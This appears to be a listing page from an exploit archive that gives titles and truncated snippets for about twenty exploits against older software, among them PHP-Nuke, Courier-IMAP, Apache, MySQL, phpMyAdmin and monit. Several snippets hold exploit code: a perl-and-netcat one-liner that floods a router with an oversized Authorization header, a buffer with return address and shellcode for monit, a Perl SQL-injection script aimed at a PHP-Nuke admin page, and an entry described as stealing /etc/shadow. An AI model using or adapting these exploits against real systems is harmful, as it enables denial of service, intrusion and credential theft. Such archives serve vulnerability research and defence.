GNU Sharutils 4.2.1 - Local Format String

GNU Sharutils 4.2.1 - Local Format String / GNU sharutils include include include include include include include include include define GNUSOURCE define DEFAULTDTORS...

PopMessenger 1.60 - Remote Denial of Service

PopMessenger 1.60 - Remote Denial of Service ///////////////////////// popmsgboom.c / by Luigi Auriemma / include include include include ifdef WIN32 include include "winerr.h" define close closesocket else include include include include include include endif define VER "0.1" define PORT 8473...

Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service

Pinnacle ShowCenter 1.51 - Web Interface Skin Denial of Service source: https://www.securityfocus.com/bid/11232/info The Pinnacle Systems ShowCenter web-based interface is reported prone to a remote denial of service vulnerability. The issue exists due to a lack of sanity checks performed on the...

PHP-Nuke - SQL Injection EditSave Messages

PHP-Nuke - SQL Injection EditSave Messages !/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy = "http://172.9.1.11:80/"; proxy:port ... $browser = LWP::UserAgent-new; $browser - agent$Agent; $url = 'http://www.sitewithphpnuke.com/admin.php';...

Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String

Courier-IMAP 3.0.2-r1 - authdebug Remote Format String / courier-imap = 3.0.2-r1 Remote Format String Vulnerability exploit Author: ktha at hush dot com Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2 Special thanks goes to andrewg for providing the FreeBSD box. Greetings: all the guys fro...

CVE-2002-1119

os.execvpe from os.py in Python 2.2.1 and earlier creates temporary files with predictable names, which could allow local users to execute arbitrary code via a symlink attack...

CesarFTP Server - Long Command Denial of Service

/ ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date : 2004-08-30...

MusicDaemon <= 0.0.3 /etc/shadow Stealer / DoS Exploit

Discovered and Exploit Coded by: Tal0n [email protected] URL: http://musicdaemon.sourceforge.net Note: This was 0day for several months.. I decided to turn it in because there may be 10 whole boxes in the world running this.. and its not very handy sitting around on my box =p. / MusicDaemon ...

PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass

milw0rm.com 2004-08-08...

PHP 4.3.7 - php-exec-dir Patch Command Access Restriction Bypass

PHP 4.3.7 - php-exec-dir Patch Command Access Restriction Bypass milw0rm.com 2004-08-08...

Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash

Right Click aOn Me And Click "Save Target As" // milw0rm.com 2004-08-04...

Conceptronic CADSLR1 Router Denial of Service Vulnerability

No description provided by source. $ $victima="ip.victim" $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization: Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80 milw0rm.com 2004-07-22...

Apache - Arbitrary Long HTTP Headers (Denial of Service)

/usr/bin/perl exploit for apache apgetmimeheaderscore vuln adv is here: http://www.guninski.com/httpd1.html version: apache 2 newPeerAddr = $host,PeerPort = $port, Proto = 'tcp' || die "new error$@\n"; binmode$sock; $hostname="Host: $host"; $buf2='A'x50; $buf4='A'x8183; $len=length$buf2; $buf="GE...

Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)

// source: https://www.securityfocus.com/bid/10710/info The Microsoft POSIX subsystem implementation is prone to a local buffer overflow vulnerability. A local attacker may exploit this vulnerability in order to run code with elevated privileges, fully compromising the vulnerable computer. /...

MySQL Authentication Bypass

NGSSoftware Insight Security Research Advisory Name: MySQL Authentication Bypass / Buffer Overflow Systems Affected: MySQL 4.1 prior to 4.1.3, and MySQL 5.0. Severity: High Vendor URL: http://www.mysql.com Author: Chris Anley [email protected] Date of Advisory: 1st July 2004 Whitepaper We hav...

phpMyAdmin 2.5.7 - Remote code Injection

phpMyAdmin 2.5.7 - Remote code Injection / phpmy-explt.c written by Nasir Simbolon eagle kecapi com Jakarta, Indonesia June, 10 2004 A phpMyAdmin-2.5.7 exploite program. This is a kind of mysql server wrapper acts like a proxy except that it will sends a fake table name, when client query "SHOW...

Fusionphp Fusion News 3.6.1 - Cross-Site Scripting

source: https://www.securityfocus.com/bid/10203/info An attacker may be capable of executing arbitrary script code in a browser of a target user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also...

cobain-monit.pl

!/usr/bin/perl cobain-monit.pl monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos and debug print "connecting to server...\n"; $socket = IO::Socket::INET -...

Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service

source: https://www.securityfocus.com/bid/10067/info It has been reported that Panda ActiveScan may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue may present it self when the 'SetSitesFile' is called in combination with setting t...

Roger Wilco Server 1.4.1 - UDP Datagram Handling Denial of Service

source: https://www.securityfocus.com/bid/10022/info Roger Wilco Server has been reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a flaw when handling malicious UDP payloads that are destined for the vulnerable server. A remote attacker may exploit...